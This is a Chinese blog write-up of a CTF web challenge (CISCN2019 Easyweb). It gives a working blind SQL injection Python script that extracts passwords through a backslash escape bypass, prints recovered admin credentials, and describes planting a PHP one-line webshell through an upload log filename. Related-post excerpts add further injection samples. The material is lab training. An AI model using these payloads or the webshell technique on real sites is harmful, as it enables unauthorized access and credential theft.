[CISCN2019 总决赛 Day2 Web1]Easyweb

最新推荐文章于 2022-05-21 17:55:47 发布
最新推荐文章于 2022-05-21 17:55:47 发布
阅读量583 收藏
点赞数 1
分类专栏: ctfWP 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20533167/article/details/119281664
版权

[CISCN2019 总决赛 Day2 Web1]Easyweb

查看rebots.txt,发现

 

然后结合抓包,只有image.php.bak存在,下载源码

 

 

经过审计

url/image.php?id=\\0&path= or 1=1 %23用这个可以绕过,

 

然后只需要改1=1部分的内容,在这里修改成sql语句,由于没有回显,所以选择盲注的方式

根据盲注内容写出脚本

根据盲注内容写出脚本

import  requests


url = "http://7a12c30e-d57c-46ca-91c6-abce0efe22b1.node4.buuoj.cn//image.php?id=\\0&path="
#payload = "or id=if(ascii(substr((select username from users),{0},1))>{1},1,0)%23"
payload = "or id=if(ascii(substr((select password from users),{0},1))>{1},1,0)%23"
result = ""
for i in range(1,100):
    l = 1
    r = 130
    mid = (l + r)>>1
    while(l<r):
        payloads = payload.format(i,mid)
        print(url+payloads)
        html = requests.get(url+payloads)
        if "JFIF" in html.text:
            l = mid +1
        else:
            r = mid
        mid = (l + r)>>1
    result+=chr(mid)
    print(result)

 

 

admin

f8fc30370a70010c08e4

好家伙,我还在解md5,结果密码明文存储

 

任意上传一个文件是这样的

 

这里的上传文件日志是一个php后缀的文件,所以可以用短标签的方法写入一个与句话木马的文件名,访问日志文件使其当做php

解析

 

右边的就是存放这个一句话木马文件名的日志文件

蚁剑访问他

 

 

4pri1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CISCN2019 华北赛区 Day2 Web1
kid的博客
09-09 1623
CISCN2019 华北赛区 Day2 Web1 前言 最近太懒一直没有怎么学习,今天把《轮到你了》结局看了也极为失望,作为黑岛的舔狗我决定好好刷题提高自己,不然都没有实力去当舔???? (当好舔????真不容易) 打开大佬的博客发现好多新的题和环境…好吧,一道一道来吧 感谢大佬提供的环境:https://github.com/glzjin/CISCN_2019_northern_China_day2_we...
layui easyweb iframe v3.1.8源码
12-08
[增加] 增加fixed方式的select,可用在表格、滚动弹窗中 [增加] 增加动态模板功能 [增加] 主页工作台、控制台的内容进行了补充完善 ...[增加] loading风格增加了一个layui简约样式 ...[优化] 切换tab自动刷新支持每个子...
CISCN2019 总决赛 Day2 Web1】-Easy web
xixihahawuwu的博客
11-28 749
进入环境是一个登录界面检查页面元素没有发现啥,我们把源码下载下来看看先看config文件 是一个数据库文件 数据库名为ciscnfinal 接着看function文件 我们可以看到有关登录界面的还有两个函数方法 看image文件Get传递两个参数 把一些字符替换成空Addslashes()函数会把一些特殊的字符转义,比如单引号转为\’,\转为\其他的看了下,没有什么信息就过掉了 我们看下upload文件要求我们用户名必须为admin 这里我们可以获得用户名admin在user文件中我们可以知道成功登陆后的.
BUUCTF [CISCN2019 总决赛 Day2 Web1] Easyweb
Senimo
12-09 2282
BUUCTF [CISCN2019 总决赛 Day2 Web1] Easyweb 考点: 启动靶机: 一个登陆页面,查看源码: <div class="clear"> </div> <div class="avtar"><img src="image.php?id=2" width="200" height="200"/></div> <form method="post" action="user.php"> 发现其存在ima
CMS程序EasyWeb 1.5 UTF-8-web1.5.zip
最新发布
03-09
[CMS程序]EasyWeb 1.5 UTF-8_web1.5.zip试卷可打印可复制可编辑
迷你最小的web服务器easyweb
03-05
迷你最小web服务器,可以用来做实验很小无需安装。
EasyWeb iframe多标签版-混淆版源码
01-03
EasyWeb iframe多标签版-混淆版源码 使用说明: 1、使IDEA、Hbuilder、浏览器等开发工具打开; 2、使用http://localhost的形式访问; 3、不能直接双击以file://的形式访问; 4、开发文档:...
EasyWeb.zip
05-30
EasyWeb Java后端,前后端分离 后台框架 核心框架 Spring、Spring MVC、Spring Boot 持久层 MyBatis、Druid、MyBatis-Plus 权限框架 Spring Security、OAuth2.0 前端框架 核心框架 layui-v2.3.0 路由框架 q.js(纯...
[CISCN2019 总决赛 Day2 Web1]Easyweb 1
m0_62879498的博客
05-21 1316
[CISCN2019 总决赛 Day2 Web1]Easyweb 1 0x00 前言 就这道题而言,并没有单一的考察某一个知识点,而是将我们前面的 sql和upload等一些知识结合起来。 0x01 备份文件下载 首先我们的打开环境 让我们进行登录 一开始我以为是弱密码爆破 直接使用bp,爆出来个寂寞 之后查看源码,抓包查看无果后 尝试进行目录扫描,发现网站中存在 robots.txt 查看robots.txt ,发现该网站中存在含有备份文件 下载备份文件 <?php include "c
buuctf-[CISCN2019 总决赛 Day2 Web1]Easyweb
m0_62094846的博客
05-18 679
扫描目录 得到*.php.bak 尝试*表示的东西, index,flag之类的都没用 有image.php,顺便可以看到可能的注入点 下载下了备份文件 <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id); $path=addslashes($path); ...
[CISCN2019 总决赛 Day2 Web1]Easyweb && [GXYCTF2019]禁止套娃
crispr的博客
03-17 1305
[CISCN2019 总决赛 Day2 Web1]Easyweb 0X01 前言 现在开始记录BUUCTF上的web了,每周认真刷一些题,了解一些知识点和套路,不要让自己这么菜。。 0X02 正文 发现是一个登录界面,先从登录框fuzz一下,看能否万能密码通过,无果。 一般直接是登录框,肯定隐藏这其他目录或者是源码泄露,所以开始扫目录 dirsearch -u "http://1606db13-...
Day30 对二分的进一步了解 最长上升子序列(O(nlogn))
离开那天的博客
05-22 105
二分的两个模板 用途其实不能相互代替 一个只能求>(=)一个只能求<(=) 所以设计二分的时候要清楚 在要寻找的数组 单调递增的时候 1、选择mid=l+r>>1还是l+r+1>>1 前者只能求>(=)a 后者只能求<(=)a 2、初始状态,若是mid=l+r>>1,那么就只要考虑r的状态要不要是开区间。 相反,若是mid=l+r+1>>1,只要考虑l的状态是否是开区间 单调递减的状态如下图 最长上升序列 O(nlogn) 传
[CISCN2019 华北赛区 Day1 Web2]ikun
satasun的博客
11-15 1597
[CISCN2019 华北赛区 Day1 Web2]ikun shopping 要买到lv6,然而当前页面上没有lv6,爆破页面来搞事情。 import requests url="http://3ecc60d7-c14f-4805-9476-71bcd91747c8.node3.buuoj.cn/shop?page=" for i in range(0,2000): print(i) r=requests.get( url + str(i) ) if 'lv6.png' in
[CISCN2019 华北赛区 Day2 Web1]Hack World
wuuconix's blog
04-02 4215
[CISCN2019 华北赛区 Day2 Web1]Hack World 这道题的考点貌似是sql盲注还是第一次遇到这种类型,表示太难了。。 主界面 它的意思是让我们给出文章的id,那我们就输入一试试。 有回显,出题人想要一个girlfriend。对此,我只想说,想peach。然后我们再输入2试试。 对这个回显,我怀疑出题人妄想症犯了。之后我们再输入3试试。 发生了错误,我们再输入万能密码试试。 好吧,它检测到sql注入了,以我目前的知识,我已经手足无措了,在网上查阅资
[ciscn2019 总决赛 day2 web1]easyweb
03-16
很高兴为您提供答案。 ciscn2019 总决赛 day2 web1 easyweb 是一道Web安全题目,需要使用SQL注入技术来解决。 首先,我们需要在登录页面中输入用户名和密码。然后,我们可以通过在用户名和密码字段中输入一些SQL注入语句来尝试绕过验证。 例如,我们可以在用户名字段中输入: admin' or 1=1# 这将导致SQL查询返回所有用户的信息,因为1=1始终为真。 然后,我们可以在密码字段中输入任何值,因为它不会被使用。 这样,我们就可以成功登录并获得flag。 希望这可以帮助您解决这道题目。如果您有任何其他问题,请随时问我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值